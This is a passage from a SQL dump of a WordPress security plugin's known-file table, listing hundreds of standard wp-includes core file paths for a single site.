(4432, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style-rtl.min.css', 'wp-includes/blocks/site-logo/style-rtl.min.css'),
(4433, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style.css', 'wp-includes/blocks/site-logo/style.css'),
(4434, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style.min.css', 'wp-includes/blocks/site-logo/style.min.css'),
(4435, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo.php', 'wp-includes/blocks/site-logo.php'),
(4436, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/block.json', 'wp-includes/blocks/site-tagline/block.json'),
(4437, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor-rtl.css', 'wp-includes/blocks/site-tagline/editor-rtl.css'),
(4438, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor-rtl.min.css', 'wp-includes/blocks/site-tagline/editor-rtl.min.css'),
(4439, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor.css', 'wp-includes/blocks/site-tagline/editor.css'),
(4440, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor.min.css', 'wp-includes/blocks/site-tagline/editor.min.css'),
(4441, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline.php', 'wp-includes/blocks/site-tagline.php'),
(4442, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/block.json', 'wp-includes/blocks/site-title/block.json'),
(4443, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor-rtl.css', 'wp-includes/blocks/site-title/editor-rtl.css'),
(4444, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor-rtl.min.css', 'wp-includes/blocks/site-title/editor-rtl.min.css'),
(4445, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor.css', 'wp-includes/blocks/site-title/editor.css'),
(4446, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor.min.css', 'wp-includes/blocks/site-title/editor.min.css'),
(4447, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style-rtl.css', 'wp-includes/blocks/site-title/style-rtl.css'),
(4448, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style-rtl.min.css', 'wp-includes/blocks/site-title/style-rtl.min.css'),
(4449, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style.css', 'wp-includes/blocks/site-title/style.css'),
(4450, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style.min.css', 'wp-includes/blocks/site-title/style.min.css'),
(4451, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title.php', 'wp-includes/blocks/site-title.php'),
(4452, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/block.json', 'wp-includes/blocks/social-link/block.json'),
(4453, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor-rtl.css', 'wp-includes/blocks/social-link/editor-rtl.css'),
(4454, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor-rtl.min.css', 'wp-includes/blocks/social-link/editor-rtl.min.css'),
(4455, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor.css', 'wp-includes/blocks/social-link/editor.css'),
(4456, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor.min.css', 'wp-includes/blocks/social-link/editor.min.css'),
(4457, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link.php', 'wp-includes/blocks/social-link.php'),
(4458, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/block.json', 'wp-includes/blocks/social-links/block.json'),
(4459, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor-rtl.css', 'wp-includes/blocks/social-links/editor-rtl.css'),
(4460, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor-rtl.min.css', 'wp-includes/blocks/social-links/editor-rtl.min.css'),
(4461, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor.css', 'wp-includes/blocks/social-links/editor.css'),
(4462, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor.min.css', 'wp-includes/blocks/social-links/editor.min.css'),
(4463, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style-rtl.css', 'wp-includes/blocks/social-links/style-rtl.css'),
(4464, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style-rtl.min.css', 'wp-includes/blocks/social-links/style-rtl.min.css'),
(4465, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style.css', 'wp-includes/blocks/social-links/style.css'),
(4466, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style.min.css', 'wp-includes/blocks/social-links/style.min.css'),
(4467, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/block.json', 'wp-includes/blocks/spacer/block.json'),
(4468, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor-rtl.css', 'wp-includes/blocks/spacer/editor-rtl.css'),
(4469, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor-rtl.min.css', 'wp-includes/blocks/spacer/editor-rtl.min.css'),
(4470, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor.css', 'wp-includes/blocks/spacer/editor.css'),
(4471, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor.min.css', 'wp-includes/blocks/spacer/editor.min.css'),
(4472, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style-rtl.css', 'wp-includes/blocks/spacer/style-rtl.css'),
(4473, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style-rtl.min.css', 'wp-includes/blocks/spacer/style-rtl.min.css'),
(4474, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style.css', 'wp-includes/blocks/spacer/style.css'),
(4475, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style.min.css', 'wp-includes/blocks/spacer/style.min.css'),
(4476, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/block.json', 'wp-includes/blocks/table/block.json'),
(4477, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor-rtl.css', 'wp-includes/blocks/table/editor-rtl.css'),
(4478, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor-rtl.min.css', 'wp-includes/blocks/table/editor-rtl.min.css'),
(4479, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor.css', 'wp-includes/blocks/table/editor.css'),
(4480, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor.min.css', 'wp-includes/blocks/table/editor.min.css'),
(4481, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style-rtl.css', 'wp-includes/blocks/table/style-rtl.css'),
(4482, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style-rtl.min.css', 'wp-includes/blocks/table/style-rtl.min.css'),
(4483, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style.css', 'wp-includes/blocks/table/style.css'),
(4484, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style.min.css', 'wp-includes/blocks/table/style.min.css'),
(4485, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme-rtl.css', 'wp-includes/blocks/table/theme-rtl.css'),
(4486, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme-rtl.min.css', 'wp-includes/blocks/table/theme-rtl.min.css'),
(4487, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme.css', 'wp-includes/blocks/table/theme.css'),
(4488, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme.min.css', 'wp-includes/blocks/table/theme.min.css'),
(4489, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/block.json', 'wp-includes/blocks/tag-cloud/block.json'),
(4490, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style-rtl.css', 'wp-includes/blocks/tag-cloud/style-rtl.css'),
(4491, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style-rtl.min.css', 'wp-includes/blocks/tag-cloud/style-rtl.min.css'),
(4492, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style.css', 'wp-includes/blocks/tag-cloud/style.css'),
(4493, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style.min.css', 'wp-includes/blocks/tag-cloud/style.min.css'),
(4494, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud.php', 'wp-includes/blocks/tag-cloud.php'),
(4495, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/block.json', 'wp-includes/blocks/template-part/block.json'),
(4496, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor-rtl.css', 'wp-includes/blocks/template-part/editor-rtl.css'),
(4497, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor-rtl.min.css', 'wp-includes/blocks/template-part/editor-rtl.min.css'),
(4498, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor.css', 'wp-includes/blocks/template-part/editor.css'),
(4499, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor.min.css', 'wp-includes/blocks/template-part/editor.min.css'),
(4500, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme-rtl.css', 'wp-includes/blocks/template-part/theme-rtl.css'),
(4501, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme-rtl.min.css', 'wp-includes/blocks/template-part/theme-rtl.min.css'),
(4502, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme.css', 'wp-includes/blocks/template-part/theme.css'),
(4503, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme.min.css', 'wp-includes/blocks/template-part/theme.min.css'),
(4504, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part.php', 'wp-includes/blocks/template-part.php'),
(4505, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/block.json', 'wp-includes/blocks/term-description/block.json'),
(4506, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style-rtl.css', 'wp-includes/blocks/term-description/style-rtl.css'),
(4507, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style-rtl.min.css', 'wp-includes/blocks/term-description/style-rtl.min.css'),
(4508, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style.css', 'wp-includes/blocks/term-description/style.css'),
(4509, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style.min.css', 'wp-includes/blocks/term-description/style.min.css'),
(4510, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description.php', 'wp-includes/blocks/term-description.php'),
(4511, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/block.json', 'wp-includes/blocks/text-columns/block.json'),
(4512, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor-rtl.css', 'wp-includes/blocks/text-columns/editor-rtl.css'),
(4513, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor-rtl.min.css', 'wp-includes/blocks/text-columns/editor-rtl.min.css'),
(4514, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor.css', 'wp-includes/blocks/text-columns/editor.css'),
(4515, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor.min.css', 'wp-includes/blocks/text-columns/editor.min.css'),
(4516, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style-rtl.css', 'wp-includes/blocks/text-columns/style-rtl.css'),
(4517, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style-rtl.min.css', 'wp-includes/blocks/text-columns/style-rtl.min.css'),
(4518, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style.css', 'wp-includes/blocks/text-columns/style.css'),
(4519, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style.min.css', 'wp-includes/blocks/text-columns/style.min.css'),
(4520, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/block.json', 'wp-includes/blocks/verse/block.json'),
(4521, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style-rtl.css', 'wp-includes/blocks/verse/style-rtl.css'),
(4522, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style-rtl.min.css', 'wp-includes/blocks/verse/style-rtl.min.css'),
(4523, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style.css', 'wp-includes/blocks/verse/style.css'),
(4524, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style.min.css', 'wp-includes/blocks/verse/style.min.css'),
(4525, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/block.json', 'wp-includes/blocks/video/block.json'),
(4526, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor-rtl.css', 'wp-includes/blocks/video/editor-rtl.css'),
(4527, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor-rtl.min.css', 'wp-includes/blocks/video/editor-rtl.min.css'),
(4528, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor.css', 'wp-includes/blocks/video/editor.css'),
(4529, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor.min.css', 'wp-includes/blocks/video/editor.min.css'),
(4530, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style-rtl.css', 'wp-includes/blocks/video/style-rtl.css'),
(4531, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style-rtl.min.css', 'wp-includes/blocks/video/style-rtl.min.css'),
(4532, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style.css', 'wp-includes/blocks/video/style.css'),
(4533, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style.min.css', 'wp-includes/blocks/video/style.min.css'),
(4534, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme-rtl.css', 'wp-includes/blocks/video/theme-rtl.css'),
(4535, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme-rtl.min.css', 'wp-includes/blocks/video/theme-rtl.min.css'),
(4536, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme.css', 'wp-includes/blocks/video/theme.css'),
(4537, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme.min.css', 'wp-includes/blocks/video/theme.min.css'),
(4538, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/widget-group/block.json', 'wp-includes/blocks/widget-group/block.json'),
(4539, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/widget-group.php', 'wp-includes/blocks/widget-group.php'),
(4540, '/home/equipm11/public_html/happythinking.com/wp-includes/blocks.php', 'wp-includes/blocks.php'),
(4541, '/home/equipm11/public_html/happythinking.com/wp-includes/bookmark-template.php', 'wp-includes/bookmark-template.php'),
(4542, '/home/equipm11/public_html/happythinking.com/wp-includes/bookmark.php', 'wp-includes/bookmark.php'),
(4543, '/home/equipm11/public_html/happythinking.com/wp-includes/cache-compat.php', 'wp-includes/cache-compat.php'),
(4544, '/home/equipm11/public_html/happythinking.com/wp-includes/cache.php', 'wp-includes/cache.php'),
(4545, '/home/equipm11/public_html/happythinking.com/wp-includes/canonical.php', 'wp-includes/canonical.php'),
(4546, '/home/equipm11/public_html/happythinking.com/wp-includes/capabilities.php', 'wp-includes/capabilities.php'),
(4547, '/home/equipm11/public_html/happythinking.com/wp-includes/category-template.php', 'wp-includes/category-template.php'),
(4548, '/home/equipm11/public_html/happythinking.com/wp-includes/category.php', 'wp-includes/category.php'),
(4549, '/home/equipm11/public_html/happythinking.com/wp-includes/certificates/ca-bundle.crt', 'wp-includes/certificates/ca-bundle.crt'),
(4550, '/home/equipm11/public_html/happythinking.com/wp-includes/class-IXR.php', 'wp-includes/class-IXR.php'),
(4551, '/home/equipm11/public_html/happythinking.com/wp-includes/class-avif-info.php', 'wp-includes/class-avif-info.php'),
(4552, '/home/equipm11/public_html/happythinking.com/wp-includes/class-feed.php', 'wp-includes/class-feed.php'),
(4553, '/home/equipm11/public_html/happythinking.com/wp-includes/class-http.php', 'wp-includes/class-http.php'),
(4554, '/home/equipm11/public_html/happythinking.com/wp-includes/class-json.php', 'wp-includes/class-json.php'),
(4555, '/home/equipm11/public_html/happythinking.com/wp-includes/class-oembed.php', 'wp-includes/class-oembed.php'),
(4556, '/home/equipm11/public_html/happythinking.com/wp-includes/class-phpass.php', 'wp-includes/class-phpass.php'),
(4557, '/home/equipm11/public_html/happythinking.com/wp-includes/class-phpmailer.php', 'wp-includes/class-phpmailer.php'),
(4558, '/home/equipm11/public_html/happythinking.com/wp-includes/class-pop3.php', 'wp-includes/class-pop3.php'),
(4559, '/home/equipm11/public_html/happythinking.com/wp-includes/class-requests.php', 'wp-includes/class-requests.php'),
(4560, '/home/equipm11/public_html/happythinking.com/wp-includes/class-simplepie.php', 'wp-includes/class-simplepie.php'),
(4561, '/home/equipm11/public_html/happythinking.com/wp-includes/class-smtp.php', 'wp-includes/class-smtp.php'),
(4562, '/home/equipm11/public_html/happythinking.com/wp-includes/class-snoopy.php', 'wp-includes/class-snoopy.php'),
(4563, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-category-dropdown.php', 'wp-includes/class-walker-category-dropdown.php'),
(4564, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-category.php', 'wp-includes/class-walker-category.php'),
(4565, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-comment.php', 'wp-includes/class-walker-comment.php'),
(4566, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-nav-menu.php', 'wp-includes/class-walker-nav-menu.php'),
(4567, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-page-dropdown.php', 'wp-includes/class-walker-page-dropdown.php'),
(4568, '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-page.php', 'wp-includes/class-walker-page.php'),
(4569, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-admin-bar.php', 'wp-includes/class-wp-admin-bar.php'),
(4570, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-ajax-response.php', 'wp-includes/class-wp-ajax-response.php'),
(4571, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-application-passwords.php', 'wp-includes/class-wp-application-passwords.php'),
(4572, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-bindings-registry.php', 'wp-includes/class-wp-block-bindings-registry.php'),
(4573, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-bindings-source.php', 'wp-includes/class-wp-block-bindings-source.php'),
(4574, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-editor-context.php', 'wp-includes/class-wp-block-editor-context.php'),
(4575, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-list.php', 'wp-includes/class-wp-block-list.php'),
(4576, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-parser-block.php', 'wp-includes/class-wp-block-parser-block.php'),
(4577, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-parser-frame.php', 'wp-includes/class-wp-block-parser-frame.php'),
(4578, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-parser.php', 'wp-includes/class-wp-block-parser.php'),
(4579, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-pattern-categories-registry.php', 'wp-includes/class-wp-block-pattern-categories-registry.php'),
(4580, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-patterns-registry.php', 'wp-includes/class-wp-block-patterns-registry.php'),
(4581, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-styles-registry.php', 'wp-includes/class-wp-block-styles-registry.php'),
(4582, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-supports.php', 'wp-includes/class-wp-block-supports.php'),
(4583, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-template.php', 'wp-includes/class-wp-block-template.php'),
(4584, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-type-registry.php', 'wp-includes/class-wp-block-type-registry.php'),
(4585, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block-type.php', 'wp-includes/class-wp-block-type.php'),
(4586, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-block.php', 'wp-includes/class-wp-block.php'),
(4587, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-classic-to-block-menu-converter.php', 'wp-includes/class-wp-classic-to-block-menu-converter.php'),
(4588, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-comment-query.php', 'wp-includes/class-wp-comment-query.php'),
(4589, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-comment.php', 'wp-includes/class-wp-comment.php'),
(4590, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-control.php', 'wp-includes/class-wp-customize-control.php'),
(4591, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-manager.php', 'wp-includes/class-wp-customize-manager.php'),
(4592, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-nav-menus.php', 'wp-includes/class-wp-customize-nav-menus.php'),
(4593, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-panel.php', 'wp-includes/class-wp-customize-panel.php'),
(4594, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-section.php', 'wp-includes/class-wp-customize-section.php'),
(4595, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-setting.php', 'wp-includes/class-wp-customize-setting.php'),
(4596, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-customize-widgets.php', 'wp-includes/class-wp-customize-widgets.php'),
(4597, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-date-query.php', 'wp-includes/class-wp-date-query.php'),
(4598, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-dependencies.php', 'wp-includes/class-wp-dependencies.php'),
(4599, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-dependency.php', 'wp-includes/class-wp-dependency.php'),
(4600, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-duotone.php', 'wp-includes/class-wp-duotone.php'),
(4601, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-editor.php', 'wp-includes/class-wp-editor.php'),
(4602, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-embed.php', 'wp-includes/class-wp-embed.php'),
(4603, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-error.php', 'wp-includes/class-wp-error.php'),
(4604, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-fatal-error-handler.php', 'wp-includes/class-wp-fatal-error-handler.php'),
(4605, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-feed-cache-transient.php', 'wp-includes/class-wp-feed-cache-transient.php'),
(4606, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-feed-cache.php', 'wp-includes/class-wp-feed-cache.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(4607, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-hook.php', 'wp-includes/class-wp-hook.php'),
(4608, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-cookie.php', 'wp-includes/class-wp-http-cookie.php'),
(4609, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-curl.php', 'wp-includes/class-wp-http-curl.php'),
(4610, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-encoding.php', 'wp-includes/class-wp-http-encoding.php'),
(4611, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-ixr-client.php', 'wp-includes/class-wp-http-ixr-client.php'),
(4612, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-proxy.php', 'wp-includes/class-wp-http-proxy.php'),
(4613, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-requests-hooks.php', 'wp-includes/class-wp-http-requests-hooks.php'),
(4614, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-requests-response.php', 'wp-includes/class-wp-http-requests-response.php'),
(4615, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-response.php', 'wp-includes/class-wp-http-response.php'),
(4616, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http-streams.php', 'wp-includes/class-wp-http-streams.php'),
(4617, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-http.php', 'wp-includes/class-wp-http.php'),
(4618, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-image-editor-gd.php', 'wp-includes/class-wp-image-editor-gd.php'),
(4619, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-image-editor-imagick.php', 'wp-includes/class-wp-image-editor-imagick.php'),
(4620, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-image-editor.php', 'wp-includes/class-wp-image-editor.php'),
(4621, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-list-util.php', 'wp-includes/class-wp-list-util.php'),
(4622, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-locale-switcher.php', 'wp-includes/class-wp-locale-switcher.php'),
(4623, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-locale.php', 'wp-includes/class-wp-locale.php'),
(4624, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-matchesmapregex.php', 'wp-includes/class-wp-matchesmapregex.php'),
(4625, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-meta-query.php', 'wp-includes/class-wp-meta-query.php'),
(4626, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-metadata-lazyloader.php', 'wp-includes/class-wp-metadata-lazyloader.php'),
(4627, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-navigation-fallback.php', 'wp-includes/class-wp-navigation-fallback.php'),
(4628, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-network-query.php', 'wp-includes/class-wp-network-query.php'),
(4629, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-network.php', 'wp-includes/class-wp-network.php'),
(4630, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-object-cache.php', 'wp-includes/class-wp-object-cache.php'),
(4631, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-oembed-controller.php', 'wp-includes/class-wp-oembed-controller.php'),
(4632, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-oembed.php', 'wp-includes/class-wp-oembed.php'),
(4633, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-paused-extensions-storage.php', 'wp-includes/class-wp-paused-extensions-storage.php'),
(4634, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-plugin-dependencies.php', 'wp-includes/class-wp-plugin-dependencies.php'),
(4635, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-post-type.php', 'wp-includes/class-wp-post-type.php'),
(4636, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-post.php', 'wp-includes/class-wp-post.php'),
(4637, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-query.php', 'wp-includes/class-wp-query.php'),
(4638, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-recovery-mode-cookie-service.php', 'wp-includes/class-wp-recovery-mode-cookie-service.php'),
(4639, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-recovery-mode-email-service.php', 'wp-includes/class-wp-recovery-mode-email-service.php'),
(4640, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-recovery-mode-key-service.php', 'wp-includes/class-wp-recovery-mode-key-service.php'),
(4641, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-recovery-mode-link-service.php', 'wp-includes/class-wp-recovery-mode-link-service.php'),
(4642, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-recovery-mode.php', 'wp-includes/class-wp-recovery-mode.php'),
(4643, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-rewrite.php', 'wp-includes/class-wp-rewrite.php'),
(4644, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-role.php', 'wp-includes/class-wp-role.php'),
(4645, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-roles.php', 'wp-includes/class-wp-roles.php'),
(4646, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-script-modules.php', 'wp-includes/class-wp-script-modules.php'),
(4647, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-scripts.php', 'wp-includes/class-wp-scripts.php'),
(4648, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-session-tokens.php', 'wp-includes/class-wp-session-tokens.php'),
(4649, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-simplepie-file.php', 'wp-includes/class-wp-simplepie-file.php'),
(4650, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-simplepie-sanitize-kses.php', 'wp-includes/class-wp-simplepie-sanitize-kses.php'),
(4651, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-site-query.php', 'wp-includes/class-wp-site-query.php'),
(4652, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-site.php', 'wp-includes/class-wp-site.php'),
(4653, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-styles.php', 'wp-includes/class-wp-styles.php'),
(4654, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-tax-query.php', 'wp-includes/class-wp-tax-query.php'),
(4655, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-taxonomy.php', 'wp-includes/class-wp-taxonomy.php'),
(4656, '/home/equipm11/public_html/happythinking.com/wp-includes/class-wp-term-query.php', 'wp-includes/class-wp-term-query.php'),
